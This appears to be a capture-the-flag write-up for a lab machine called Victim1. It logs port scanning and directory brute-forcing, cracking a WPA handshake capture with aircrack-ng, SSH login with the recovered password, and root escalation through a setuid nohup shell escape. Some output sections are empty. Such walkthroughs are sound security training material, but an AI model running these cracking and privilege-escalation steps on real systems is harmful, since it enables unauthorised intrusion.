CTF Victim1:

  1. Netdiscover
  2. rustscan
  3. Port 80
  4. Port 9000
  5. Port 8999
  6. WPA-01.cap
  7. SSH
  8. Enum
  9. Uncommon setuid

Netdiscover

sudo netdiscover

192.168.0.23

rustscan

rustscan -a 192.168.0.23

Output:

Port 80

gobuster dir -u http://192.168.0.23 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt

Output:

http://192.168.0.23/robots.txt

On some pages I have this error:

In the htaccess file I have this message. I think it’s a joomla server.
http://192.168.0.23/htaccess.txt

End - Joomla! core SEF Section.

Port 9000

I can use gobuster on this page because he return the error 500 (Internal server error).

gobuster dir -u http://192.168.0.23:9000 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt --wildcard switch

Output:

But:

Nothing interesting.

Port 8999

It’s useless to run the gobuster scan on this web serveur because we already have the directories. It’s like an index of/ page.

It’s an webfs/1.21 server with a cap file.
I have to open it with wireshark.

WPA-01.cap


This is a capture of a wireless stream, with the SSID: dlink
I have to use aircrack-ng to find the password in the cap file with a directory attack.

aircrack-ng -w Documents/wordlist/rockyou.txt /home/peanutstick/Downloads/WPA-01.cap


The password for the SSID dlink is p4ssword.

SSH

I can use the user dlink to login via SSH.

ssh dlink@192.168.0.23

Enum


Can’t check the .bash_history.
With lse.sh:

There is nothing in /usr/bin/TryHarder!

Uncommon setuid

https://gtfobins.github.io/gtfobins/nohup/

I can’t use the commmand with sudo.

/usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"


I’m root.